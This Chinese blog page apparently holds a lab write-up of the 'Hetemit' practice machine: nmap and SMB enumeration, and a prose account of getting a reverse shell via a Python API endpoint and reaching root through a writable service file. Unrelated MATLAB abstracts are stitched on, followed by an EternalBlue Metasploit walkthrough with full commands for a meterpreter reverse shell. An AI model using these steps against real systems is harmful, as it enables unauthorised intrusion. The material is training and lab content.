PG靶机复现 Hetemit

枚举和利用阶段

端口扫描

TCP

nmap -A -T4 -Pn -n -p- 192.168.190.117

21/tcp    open  ftp         vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.180
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 b1:e2:9d:f1:f8:10:db:a5:aa:5a:22:94:e8:92:61:65 (RSA)
|   256 74:dd:fa:f2:51:dd:74:38:2b:b2:ec:82:e5:91:82:28 (ECDSA)
|_  256 48:bc:9d:eb:bd:4d:ac:b3:0b:5d:67:da:56:54:2b:a0 (ED25519)
80/tcp    open  http        Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
|_http-server-header: Apache/2.4.37 (centos)
| http-methods: 
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd 4
445/tcp   open  netbios-ssn Samba smbd 4
18000/tcp open  biimenu?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 3102
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <title>Action Controller: Exception caught</title>
|     <style>
|     body {
|     background-color: #FAFAFA;
|     color: #333;
|     margin: 0px;
|     body, p, ol, ul, td {
|     font-family: helvetica, verdana, arial, sans-serif;
|     font-size: 13px;
|     line-height: 18px;
|     font-size: 11px;
|     white-space: pre-wrap;
|     pre.box {
|     border: 1px solid #EEE;
|     padding: 10px;
|     margin: 0px;
|     width: 958px;
|     header {
|     color: #F0F0F0;
|     background: #C52F24;
|     padding: 0.5em 1.5em;
|     margin: 0.2em 0;
|     line-height: 1.1em;
|     font-size: 2em;
|     color: #C52F24;
|     line-height: 25px;
|     .details {
|_    bord
50000/tcp open  http        Werkzeug httpd 1.0.1 (Python 3.6.8)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/1.0.1 Python/3.6.8

UDP

nmap -Pn -n 192.168.190.117 -sU --top-ports=100 -reason

smb枚举

smbclient -N -L ‘//192.168.190.117’
在这里插入图片描述
发cmeeks共享
在这里插入图片描述
没有权限 无法查看

查看50000端口

在这里插入图片描述
像是API端点
在这里插入图片描述
访问verify,返回code,切换成post请求
在这里插入图片描述
导入os.system(),放回了数值,尝试是否可以执行反向shell
在这里插入图片描述
在这里插入图片描述
拿到shell

提权阶段

sudo -l
在这里插入图片描述
发现我们可以重启和关机
在这里插入图片描述
PEAS枚举发现可以写入
在这里插入图片描述
查看并且修改,反向shell,用户改成root
在这里插入图片描述
reboot重启
在这里插入图片描述
在这里插入图片描述
成功

基于数据驱动的 Koopman 算子的递归神经网络模型线性化,用于纳米定位系统的预测控制研究(Matlab代码实现)内容概要:本文围绕“基于数据驱动的 Koopman 算子的递归神经网络模型线性化,用于纳米定位系统的预测控制研究”展开,提出了一种结合数据驱动方法与Koopman算子理论的递归神经网络(RNN)模型线性化方法,旨在提升纳米定位系统的预测控制精度与动态响应能力。研究通过构建数据驱动的线性化模型,克服了传统非线性系统建模复杂、计算开销大的问题,并在Matlab平台上实现了完整的算法仿真与验证,展示了该方法在高精度定位控制中的有效性与实用性。; 适合人群:具备一定自动化、控制理论或机器学习背景的科研人员与工程技术人员,尤其是从事精密定位、智能控制、非线性系统建模与预测控制相关领域的研究生与研究人员。; 使用场景及目标:①应用于纳米级精密定位系统(如原子力显微镜、半导体制造设备)中的高性能预测控制;②为复杂非线性系统的数据驱动建模与线性化提供新思路;③结合深度学习与经典控制理论,推动智能控制算法的实际落地。; 阅读建议:建议读者结合Matlab代码实现部分,深入理解Koopman算子与RNN结合的建模范式,重点关注数据预处理、模型训练与控制系统集成等关键环节,并可通过替换实际系统数据进行迁移验证,以掌握该方法的核心思想与工程应用技巧。
基于粒子群算法优化Kmeans聚类的居民用电行为分析研究(Matlb代码实现)内容概要:本文围绕基于粒子群算法(PSO)优化Kmeans聚类的居民用电行为分析展开研究,提出了一种结合智能优化算法与传统聚类方法的技术路径。通过使用粒子群算法优化Kmeans聚类的初始聚类中心,有效克服了传统Kmeans算法易陷入局部最优、对初始值敏感的问题,提升了聚类的稳定性和准确性。研究利用Matlab实现了该算法,并应用于居民用电数据的行为模式识别与分类,有助于精细化电力需求管理、用户画像构建及个性化用电服务设计。文档还提及相关应用场景如负荷预测、电力系统优化等,并提供了配套代码资源。; 适合人群:具备一定Matlab编程基础,从事电力系统、智能优化算法、数据分析等相关领域的研究人员或工程技术人员,尤其适合研究生及科研人员。; 使用场景及目标:①用于居民用电行为的高效聚类分析,挖掘典型用电模式;②提升Kmeans聚类算法的性能,避免局部最优问题;③为电力公司开展需求响应、负荷预测和用户分群管理提供技术支持;④作为智能优化算法与机器学习结合应用的教学与科研案例。; 阅读建议:建议读者结合提供的Matlab代码进行实践操作,深入理解PSO优化Kmeans的核心机制,关注参数设置对聚类效果的影响,并尝试将其应用于其他相似的数据聚类问题中,以加深理解和拓展应用能力。
### 环境搭建与配置 为了成功复现 EternalBlue 漏洞,首先需要准备好实验环境。靶机选择 **Windows 7** 系统,IP 地址为 `192.168.244.133`;攻击机使用 **Kali Linux**,IP 地址为 `192.168.244.136`。所需工具包括 `nmap` 和 `metasploit-framework (MSF)`,这些工具默认集成在 Kali 系统中[^1]。 #### 靶机准备 - 安装 Windows 7 系统,并确保未安装补丁 KB4012598(该补丁修复了 MS17-010 漏洞)。 - 关闭防火墙或允许 SMB 协议通过。 - 确保系统开启了文件共享功能,SMB 服务运行正常。 #### 攻击机准备 - 安装 Kali Linux 并更新系统。 - 安装 Metasploit Framework,可通过命令 `sudo apt install metasploit-framework` 进行安装。 - 确认 nmap 已安装,用于网络扫描和端口探测。 ### 使用 Metasploit 复现 EternalBlue 漏洞 #### 启动 Metasploit Framework 打开终端并输入以下命令启动 Metasploit: ```bash msfconsole ``` 进入 Metasploit 控制台后,输出信息显示当前版本及模块数量,如下所示: ``` =[ metasploit v6.3.27-dev ] + -- --=[ 2335 exploits - 1220 auxiliary - 413 post ] + -- --=[ 1385 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] ``` #### 搜索 EternalBlue 模块 在 Metasploit 控制台中执行以下命令搜索相关模块: ```bash search eternalblue ``` 系统将列出多个与 EternalBlue 相关的模块,例如 `exploit/windows/smb/ms17_010_eternalblue`。选择该模块进行漏洞利用: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` #### 设置目标与负载 查看模块所需的参数: ```bash show options ``` 主要需要设置以下参数: - `RHOSTS`: 靶机 IP 地址,即 `192.168.244.133` - `LHOST`: 攻击机 IP 地址,即 `192.168.244.136` 设置参数命令如下: ```bash set RHOSTS 192.168.244.133 set LHOST 192.168.244.136 ``` 默认情况下,模块会使用合适的 payload,如 `windows/x64/meterpreter/reverse_tcp`。若需更改 payload,可使用 `set payload` 命令指定。 #### 执行漏洞利用 完成所有设置后,执行漏洞利用: ```bash exploit ``` 如果一切顺利,Metasploit 将尝试连接靶机并通过 SMB 协议发送恶意数据包,最终获得 Meterpreter 会话。 #### 成功获取 Meterpreter 会话 一旦漏洞利用成功,控制台将显示 Meterpreter 提示符,表示已成功获取目标系统的控制权。此时可以执行多种操作,如上传文件、执行命令等。 ```bash meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` 上述结果显示当前权限为 `NT AUTHORITY\SYSTEM`,即最高权限,说明漏洞利用成功。 ### 注意事项与防御建议 - **测试环境隔离**:确保实验环境与生产网络隔离,避免误伤真实系统。 - **漏洞修复**:微软已于 2017 年发布补丁 KB4012598 修复此漏洞。对于实际环境中未打补丁的系统,应尽快安装官方补丁。 - **SMB 协议防护**:企业网络中应限制 SMB 协议的外部访问,关闭不必要的共享服务,启用防火墙规则阻止非法 SMB 请求。 - **入侵检测**:部署 IDS/IPS 系统,监控异常 SMB 流量,及时发现类似 EternalBlue 的攻击行为。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值